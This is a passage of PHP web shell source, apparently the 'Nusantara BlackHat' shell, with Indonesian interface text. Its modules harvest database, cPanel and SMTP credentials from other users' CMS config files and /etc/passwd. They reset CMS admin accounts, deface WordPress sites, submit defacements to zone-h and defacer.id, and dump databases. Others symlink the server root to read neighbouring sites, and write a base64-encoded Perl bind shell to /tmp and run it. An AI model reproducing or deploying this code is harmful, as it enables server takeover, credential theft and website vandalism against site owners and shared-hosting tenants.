                            $domain_jump = file_get_contents("/etc/named.conf");   
                            if($domain_jump == '') {
                                echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
                            } else {
                                preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
                                foreach($domains_jump[1] as $dj) {
                                    $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
                                    $user_jumping_url = $user_jumping_url['name'];
                                    if($user_jumping_url == $user_idx_jump) {
                                        echo " => ( <u>$dj</u> )<br>";
                                        break;
                                    }
                                }
                            }
                        } else {
                            echo "<br>";
                        }
                    }
                }
            }
        }
        if($i == 0) {
        } else {
            echo "<br>Total ada ".$i." Kamar di ".$ip;
        }
        echo "</pre>";
    }
    echo "</div>";
} elseif($_GET['do'] == 'auto_edit_user') {
    if($_POST['hajar']) {
        if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
            echo "username atau password harus lebih dari 6 karakter";
        } else {
            $user_baru = $_POST['user_baru'];
            $pass_baru = md5($_POST['pass_baru']);
            $conf = $_POST['config_dir'];
            $scan_conf = scandir($conf);
            foreach($scan_conf as $file_conf) {
                if(!is_file("$conf/$file_conf")) continue;
                $config = file_get_contents("$conf/$file_conf");
                if(preg_match("/JConfig|joomla/",$config)) {
                    $dbhost = ambilkata($config,"host = '","'");
                    $dbuser = ambilkata($config,"user = '","'");
                    $dbpass = ambilkata($config,"password = '","'");
                    $dbname = ambilkata($config,"db = '","'");
                    $dbprefix = ambilkata($config,"dbprefix = '","'");
                    $prefix = $dbprefix."users";
                    $conn = mysql_connect($dbhost,$dbuser,$dbpass);
                    $db = mysql_select_db($dbname);
                    $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
                    $result = mysql_fetch_array($q);
                    $id = $result['id'];
                    $site = ambilkata($config,"sitename = '","'");
                    $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
                    echo "Config => ".$file_conf."<br>";
                    echo "CMS => Joomla<br>";
                    if($site == '') {
                        echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
                    } else {
                        echo "Sitename => $site<br>";
                    }
                    if(!$update OR !$conn OR !$db) {
                        echo "Status => <font color=red>".mysql_error()."</font><br><br>";
                    } else {
                        echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
                    }
                    mysql_close($conn);
                } elseif(preg_match("/WordPress/",$config)) {
                    $dbhost = ambilkata($config,"DB_HOST', '","'");
                    $dbuser = ambilkata($config,"DB_USER', '","'");
                    $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
                    $dbname = ambilkata($config,"DB_NAME', '","'");
                    $dbprefix = ambilkata($config,"table_prefix  = '","'");
                    $prefix = $dbprefix."users";
                    $option = $dbprefix."options";
                    $conn = mysql_connect($dbhost,$dbuser,$dbpass);
                    $db = mysql_select_db($dbname);
                    $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
                    $result = mysql_fetch_array($q);
                    $id = $result[ID];
                    $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
                    $result2 = mysql_fetch_array($q2);
                    $target = $result2[option_value];
                    if($target == '') {
                        $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
                    } else {
                        $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
                    }
                    $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
                    echo "Config => ".$file_conf."<br>";
                    echo "CMS => Wordpress<br>";
                    echo $url_target;
                    if(!$update OR !$conn OR !$db) {
                        echo "Status => <font color=red>".mysql_error()."</font><br><br>";
                    } else {
                        echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
                    }
                    mysql_close($conn);
                } elseif(preg_match("/Magento|Mage_Core/",$config)) {
                    $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
                    $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
                    $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
                    $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
                    $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
                    $prefix = $dbprefix."admin_user";
                    $option = $dbprefix."core_config_data";
                    $conn = mysql_connect($dbhost,$dbuser,$dbpass);
                    $db = mysql_select_db($dbname);
                    $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
                    $result = mysql_fetch_array($q);
                    $id = $result[user_id];
                    $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
                    $result2 = mysql_fetch_array($q2);
                    $target = $result2[value];
                    if($target == '') {
                        $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
                    } else {
                        $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
                    }
                    $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
                    echo "Config => ".$file_conf."<br>";
                    echo "CMS => Magento<br>";
                    echo $url_target;
                    if(!$update OR !$conn OR !$db) {
                        echo "Status => <font color=red>".mysql_error()."</font><br><br>";
                    } else {
                        echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
                    }
                    mysql_close($conn);
                } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
                    $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
                    $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
                    $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
                    $dbname = ambilkata($config,"'DB_DATABASE', '","'");
                    $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
                    $prefix = $dbprefix."user";
                    $conn = mysql_connect($dbhost,$dbuser,$dbpass);
                    $db = mysql_select_db($dbname);
                    $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
                    $result = mysql_fetch_array($q);
                    $id = $result[user_id];
                    $target = ambilkata($config,"HTTP_SERVER', '","'");
                    if($target == '') {
                        $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
                    } else {
                        $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
                    }
                    $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
                    echo "Config => ".$file_conf."<br>";
                    echo "CMS => OpenCart<br>";
                    echo $url_target;
                    if(!$update OR !$conn OR !$db) {
                        echo "Status => <font color=red>".mysql_error()."</font><br><br>";
                    } else {
                        echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
                    }
                    mysql_close($conn);
                } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
                    $dbhost = ambilkata($config,'server = "','"');
                    $dbuser = ambilkata($config,'username = "','"');
                    $dbpass = ambilkata($config,'password = "','"');
                    $dbname = ambilkata($config,'database = "','"');
                    $prefix = "users";
                    $option = "identitas";
                    $conn = mysql_connect($dbhost,$dbuser,$dbpass);
                    $db = mysql_select_db($dbname);
                    $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
                    $result = mysql_fetch_array($q);
                    $target = $result[alamat_website];
                    if($target == '') {
                        $target2 = $result[url];
                        $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
                        if($target2 == '') {
                            $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
                        } else {
                            $cek_login3 = file_get_contents("$target2/adminweb/");
                            $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
                            if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
                                $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
                            } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
                                $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
                            } else {
                                $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
                            }
                        }
                    } else {
                        $cek_login = file_get_contents("$target/adminweb/");
                        $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
                        if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
                            $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
                        } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
                            $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
                        } else {
                            $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
                        }
                    }
                    $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
                    echo "Config => ".$file_conf."<br>";
                    echo "CMS => Lokomedia<br>";
                    if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
                        echo $url_target2;
                    } else {
                        echo $url_target;
                    }
                    if(!$update OR !$conn OR !$db) {
                        echo "Status => <font color=red>".mysql_error()."</font><br><br>";
                    } else {
                        echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
                    }
                    mysql_close($conn);
                }
            }
        }
    } else {
        echo "<center>
        <h1>Auto Edit User Config</h1>
        <form method='post'>
        DIR Config: <br>
        <input type='text' size='50' name='config_dir' value='$dir'><br><br>
        Set User & Pass: <br>
        <input type='text' name='user_baru' value='n45ht123' placeholder='user_baru'><br>
        <input type='text' name='pass_baru' value='n45ht123' placeholder='pass_baru'><br>
        <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
        </form>
        <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
        ";
    }
} elseif($_GET['do'] == 'cpanel') {
	if($_POST['crack']) {
		$usercp = explode("rn", $_POST['user_cp']);
		$passcp = explode("rn", $_POST['pass_cp']);
		$i = 0;
		foreach($usercp as $ucp) {
			foreach($passcp as $pcp) {
				if(@mysql_connect('localhost', $ucp, $pcp)) {
					if($_SESSION[$ucp] && $_SESSION[$pcp]) {
					} else {
						$_SESSION[$ucp] = "1";
						$_SESSION[$pcp] = "1";
						if($ucp == '' || $pcp == '') {
							
						} else {
							$i++;
							if(function_exists('posix_getpwuid')) {
								$domain_cp = file_get_contents("/etc/named.conf");	
								if($domain_cp == '') {
									$dom =  "<font color=red>gabisa ambil nama domain nya</font>";
								} else {
									preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
									foreach($domains_cp[1] as $dj) {
										$user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
										$user_cp_url = $user_cp_url['name'];
										if($user_cp_url == $ucp) {
											$dom = "<a href='http://$dj/' target='_blank'><font color=blue>$dj</font></a>";
											break;
										}
									}
								}
							} else {
								$dom = "<font color=red>function is Disable by system</font>";
							}
							echo "username (<font color=blue>$ucp</font>) password (<font color=blue>$pcp</font>) domain ($dom)<br>";
						}
					}
				}
			}
		}
		if($i == 0) {
		} else {
			echo "<br>sukses nyolong ".$i." Cpanel by <font color=blue>Nusantara_BlackHat</font>";
		}
	} else {
		echo "<center>
		<form method='post'>
		USER: <br>
		<textarea style='width: 450px; height: 150px;' name='user_cp'>";
		$_usercp = fopen("/etc/passwd","r");
		while($getu = fgets($_usercp)) {
			if($getu == '' || !$_usercp) {
				echo "<font color=red>Can't read /etc/passwd</font>";
			} else {
				preg_match_all("/(.*?):x:/", $getu, $u);
				foreach($u[1] as $user_cp) {
						if(is_dir("/home/$user_cp/public_html")) {
							echo "$user_cpn";
					}
				}
			}
		}
		echo "</textarea><br>
		PASS: <br>
		<textarea style='width: 450px; height: 200px;' name='pass_cp'>";
		function cp_pass($dir) {
			$pass = "";
			$dira = scandir($dir);
			foreach($dira as $dirb) {
				if(!is_file("$dir/$dirb")) continue;
				$ambil = file_get_contents("$dir/$dirb");
				if(preg_match("/WordPress/", $ambil)) {
					$pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."n";
				} elseif(preg_match("/JConfig|joomla/", $ambil)) {
					$pass .= ambilkata($ambil,"password = '","'")."n";
				} elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
					$pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."n";
				} elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
					$pass .= ambilkata($ambil,'password = "','"')."n";
				} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
					$pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."n";
				} elseif(preg_match("/client/", $ambil)) {
					preg_match("/password=(.*)/", $ambil, $pass1);
					$pass .= $pass1[1]."n";
					if(preg_match('/"/', $pass1[1])) {
						$pass1[1] = str_replace('"', "", $pass1[1]);
						$pass .= $pass1[1]."n";
					}
				} elseif(preg_match("/cc_encryption_hash/", $ambil)) {
					$pass .= ambilkata($ambil,"db_password = '","'")."n";
				}
			}
			echo $pass;
		}
		$cp_pass = cp_pass($dir);
		echo $cp_pass;
		echo "</textarea><br>
		<input type='submit' name='crack' style='width: 450px;' value='Crack'>
		</form>
		<span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
	}
} elseif($_GET['do'] == 'smtp') {
    echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
    function scj($dir) {
        $dira = scandir($dir);
        foreach($dira as $dirb) {
            if(!is_file("$dir/$dirb")) continue;
            $ambil = file_get_contents("$dir/$dirb");
            $ambil = str_replace("$", "", $ambil);
            if(preg_match("/JConfig|joomla/", $ambil)) {
                $smtp_host = ambilkata($ambil,"smtphost = '","'");
                $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
                $smtp_user = ambilkata($ambil,"smtpuser = '","'");
                $smtp_pass = ambilkata($ambil,"smtppass = '","'");
                $smtp_port = ambilkata($ambil,"smtpport = '","'");
                $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
                echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
                echo "SMTP port: <font color=lime>$smtp_port</font><br>";
                echo "SMTP user: <font color=lime>$smtp_user</font><br>";
                echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
                echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
                echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
            }
        }
    }
    $smpt_hunter = scj($dir);
    echo $smpt_hunter;
} elseif($_GET['do'] == 'auto_wp') {
    if($_POST['hajar']) {
        $title = htmlspecialchars($_POST['new_title']);
        $pn_title = str_replace(" ", "-", $title);
        if($_POST['cek_edit'] == "Y") {
            $script = $_POST['edit_content'];
        } else {
            $script = $title;
        }
        $conf = $_POST['config_dir'];
        $scan_conf = scandir($conf);
        foreach($scan_conf as $file_conf) {
            if(!is_file("$conf/$file_conf")) continue;
            $config = file_get_contents("$conf/$file_conf");
            if(preg_match("/WordPress/", $config)) {
                $dbhost = ambilkata($config,"DB_HOST', '","'");
                $dbuser = ambilkata($config,"DB_USER', '","'");
                $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
                $dbname = ambilkata($config,"DB_NAME', '","'");
                $dbprefix = ambilkata($config,"table_prefix  = '","'");
                $prefix = $dbprefix."posts";
                $option = $dbprefix."options";
                $conn = mysql_connect($dbhost,$dbuser,$dbpass);
                $db = mysql_select_db($dbname);
                $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
                $result = mysql_fetch_array($q);
                $id = $result[ID];
                $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
                $result2 = mysql_fetch_array($q2);
                $target = $result2[option_value];
                $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
                $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
                echo "<div style='margin: 5px auto;'>";
                if($target == '') {
                    echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
                } else {
                    echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
                }
                if(!$update OR !$conn OR !$db) {
                    echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
                } else {
                    echo "<font color=lime>sukses di ganti.</font><br>";
                }
                echo "</div>";
                mysql_close($conn);
            }
        }
    } else {
        echo "<center>
        <h1>Auto Edit Title+Content WordPress</h1>
        <form method='post'>
        DIR Config: <br>
        <input type='text' size='50' name='config_dir' value='$dir'><br><br>
        Set Title: <br>
        <input type='text' name='new_title' value='Hacked by Nusantara BlackHat' placeholder='New Title'><br><br>
        Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
        <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
        <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
        <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
        </form>
        <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
        ";
    }
} elseif($_GET['do'] == 'zoneh') {
    if($_POST['submit']) {
        $domain = explode("
", $_POST['url']);
        $nick =  $_POST['nick'];
        echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
        echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
        function zoneh($url,$nick) {
            $ch = curl_init("http://www.zone-h.com/notify/single");
                  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                  curl_setopt($ch, CURLOPT_POST, true);
                  curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
            return curl_exec($ch);
                  curl_close($ch);
        }
        foreach($domain as $url) {
            $zoneh = zoneh($url,$nick);
            if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
                echo "$url -> <font color=lime>OK</font><br>";
            } else {
                echo "$url -> <font color=red>ERROR</font><br>";
            }
        }
    } else {
        echo "<center><form method='post'>
        <u>Defacer</u>: <br>
        <input type='text' name='nick' size='50' value='Your Nick'><br>
        <u>Domains</u>: <br>
        <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
        <input type='submit' name='submit' value='Submit' style='width: 450px;'>
        </form>";
    }
    echo "</center>";
}elseif($_GET['do'] == 'defacerid') {
echo "<center><form method='POST' action=''>
<br>
<h1>Defacer ID Notify </h1>
<br>
Attacker : <br><input type='text' name='nick' placeholder='Hekel'><br>
Team : <br><input type='text' name='team' placeholder='Team'><br>
Sites : <br><textarea name='sites' placeholder='http://nekopoi.site' style='width: 450px; height: 150px;'></textarea><br>
<input type='submit' name='sikat' value='Submit!!'>
</form>";


error_reporting(0);
$nick = $_POST['nick'];
$team = $_POST['team'];
$sikat = $_POST['sikat'];
$url = explode("
", $_POST['sites']);
if($sikat){
echo "Notify with nick [ ".$nick." ] and With Team [ ".$team." ] <p>";
function defid($url,$nick,$team) {
$ch = curl_init("https://defacer.id/archives/notify");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, "attacker=$nick&team=$team&poc=SQL Injection&url=$url");
return curl_exec($ch);
curl_close($ch);
}
foreach($url as $url) {
$defid = defid($url,$nick,$team);
if(preg_match('#<div class="success-box">#', $defid)) {
echo "<font color='lime' size='3'>Ok -></font>".$url."<p>";
} else {
echo "<font color='red' size='3'>Error -></font> ".$url."<p>";
	}
}
}
}
/////////////////
elseif($_GET['do'] == 'dbdump')
    {
echo $head.'<p align="center">';
echo '
<center><form action method=post>
<table width=371 class=tabnet >
<tr><th colspan="2">Database Dump</th></tr>
<tr>
	<td>Server </td>
	<td><input class="inputz" type=text name=server size=52></td></tr><tr>
	<td>Username</td>
	<td><input class="inputz" type=text name=username size=52></td></tr><tr>
	<td>Password</td>
	<td><input class="inputz" type=text name=password size=52></td></tr><tr>
	<td>DataBase Name</td>
	<td><input class="inputz" type=text name=dbname size=52></td></tr>
	<tr>
	<td>DB Type </td>
	<td><form method=post action="'.$me.'">
	<select class="inputz" name=method>
		<option  value="gzip">Gzip</option>
		<option value="sql">Sql</option>
		</select>
	<input class="inputzbut" type=submit value="  Dump!  " ></td></tr>
	</form></center></table></center>';
if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
$date = date("Y-m-d");
$dbserver = $_POST['server'];
$dbuser = $_POST['username'];
$dbpass = $_POST['password'];
$dbname = $_POST['dbname'];
$file = "Dump-$dbname-$date";
$method = $_POST['method'];
if ($method=='sql'){
$file="Dump-$dbname-$date.sql";
$fp=fopen($file,"w");
}else{
$file="Dump-$dbname-$date.sql.gz";
$fp = gzopen($file,"w");
}
function write($data) {
global $fp;
if ($_POST['method']=='ssql'){
fwrite($fp,$data);
}else{
gzwrite($fp, $data);
}}
mysql_connect ($dbserver, $dbuser, $dbpass);
mysql_select_db($dbname);
$tables = mysql_query ("SHOW TABLES");
while ($i = mysql_fetch_array($tables)) {
    $i = $i['Tables_in_'.$dbname];
    $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
    write($create['Create Table'].";nn");
    $sql = mysql_query ("SELECT * FROM ".$i);
    if (mysql_num_rows($sql)) {
        while ($row = mysql_fetch_row($sql)) {
            foreach ($row as $j => $k) {
                $row[$j] = "'".mysql_escape_string($k)."'";
            }
            write("INSERT INTO $i VALUES(".implode(",", $row).");n");
        }
    }
}
if ($method=='ssql'){
fclose ($fp);
}else{
gzclose($fp);}
header("Content-Disposition: attachment; filename=" . $file);   
header("Content-Type: application/download");
header("Content-Length: " . filesize($file));
flush();

$fp = fopen($file, "r");
while (!feof($fp))
{
    echo fread($fp, 65536);
    flush();
} 
fclose($fp); 
}

}

///////////////////////////////////
elseif($_GET['do'] == 'symlink') {
$full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
$d0mains = @file("/etc/named.conf");
##httaces
if($d0mains){
@mkdir("nb_sym",0777);
@chdir("nb_sym");
@exe("ln -s / root");
$file3 = 'Options Indexes FollowSymLinks
DirectoryIndex n45ht.htm
AddType text/plain .php
AddHandler text/plain .php
Satisfy Any';
$fp3 = fopen('.htaccess','w');
$fw3 = fwrite($fp3,$file3);@fclose($fp3);
echo "
<table align=center border=1 style='width:70%;border-color:#333333;'>
<tr>
<td align=center>-<font size=3>-S. No.-</font></td>
<td align=center>-<font size=3>-Domains-</font></td>
<td align=center>-<font size=3>-Users-</font></td>
<td align=center>-<font size=3>-Symlink-</font></td>
</tr>";
$dcount = 1;
foreach($d0mains as $d0main){
if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
flush();
if(strlen(trim($domains[1][0])) > 2){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
<td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
<td>".$user['name']."</td>
<td><a href='$full/nb_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
flush();
$dcount++;}}}
echo "</table>";
}else{
$TEST=@file('/etc/passwd');
if ($TEST){
@mkdir("nb_sym",0777);
@chdir("nb_sym");
exe("ln -s / root");
$file3 = 'Options Indexes FollowSymLinks
DirectoryIndex n45ht.htm
AddType text/plain .php
AddHandler text/plain .php
Satisfy Any';
 $fp3 = fopen('.htaccess','w');
 $fw3 = fwrite($fp3,$file3);
 @fclose($fp3);
 echo "
 <table align=center border=1><tr>
 <td align=center><font size=3>-S. No.-</font></td>
 <td align=center><font size=3>-Users-</font></td>
 <td align=center><font size=3>-Symlink-</font></td></tr>";
 $dcount = 1;
 $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
 while(!feof($file)){
 $s = fgets($file);
 $matches = array();
 $t = preg_match('//(.*?)://s', $s, $matches);
 $matches = str_replace("home/","",$matches[1]);
 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
 continue;
 echo "<tr><td align=center><font size=2>" . $dcount . "</td>
 <td align=center><font class=txt>" . $matches . "</td>";
 echo "<td align=center><font class=txt><a href=$full/nb_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
 $dcount++;}fclose($file);
 echo "</table>";}else{if($os != "Windows"){@mkdir("nb_sym",0777);@chdir("nb_sym");@exe("ln -s / root");$file3 = '
 Options Indexes FollowSymLinks
DirectoryIndex n45ht.htm
AddType text/plain .php
AddHandler text/plain .php
Satisfy Any
';
 $fp3 = fopen('.htaccess','w');
 $fw3 = fwrite($fp3,$file3);@fclose($fp3);
 echo "
 <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
 <table align=center border=1><tr>
 <td align=center><font size=3>ID</font></td>
 <td align=center><font size=3>Users</font></td>
 <td align=center><font size=3>Symlink</font></td></tr>";
 $temp = "";$val1 = 0;$val2 = 1000;
 for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
 if ($uid)$temp .= join(':',$uid)."n";}
 echo '<br/>';$temp = trim($temp);$file5 =
 fopen("test.txt","w");
 fputs($file5,$temp);
 fclose($file5);$dcount = 1;$file =
 fopen("test.txt", "r") or exit("Unable to open file!");
 while(!feof($file)){$s = fgets($file);$matches = array();
 $t = preg_match('//(.*?)://s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
 continue;
 echo "<tr><td align=center><font size=2>" . $dcount . "</td>
 <td align=center><font class=txt>" . $matches . "</td>";
 echo "<td align=center><font class=txt><a href=$full/nb_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
 $dcount++;}
 fclose($file);
 echo "</table></div></center>";unlink("test.txt");
 } else
 echo "<center><font size=3>Cannot create Symlink</font></center>";
 }
 }
} 
////////////////////
 elseif($_GET['do'] == 'backconnect') {
	echo "<form method='post'>
	<u>Bind Port:</u> <br>
	PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
	<input type='submit' name='sub_bp' value='>>'>
	</form>
	<form method='post'>
	<u>Back Connect:</u> <br>
	Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
	PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
	<input type='submit' name='sub_bc' value='>>'>
	</form>";
	$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
	if(isset($_POST['sub_bp'])) {
		$f_bp = fopen("/tmp/bp.pl", "w");
		fwrite($f_bp, base64_decode($bind_port_p));
		fclose($f_bp);

		$port = $_POST['port_bind'];
		$out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
		sleep(1);
		echo "<pre>".$out."n".exe("ps aux | grep bp.pl")."</pre>";
		unlink("/tmp/bp.pl");
	}
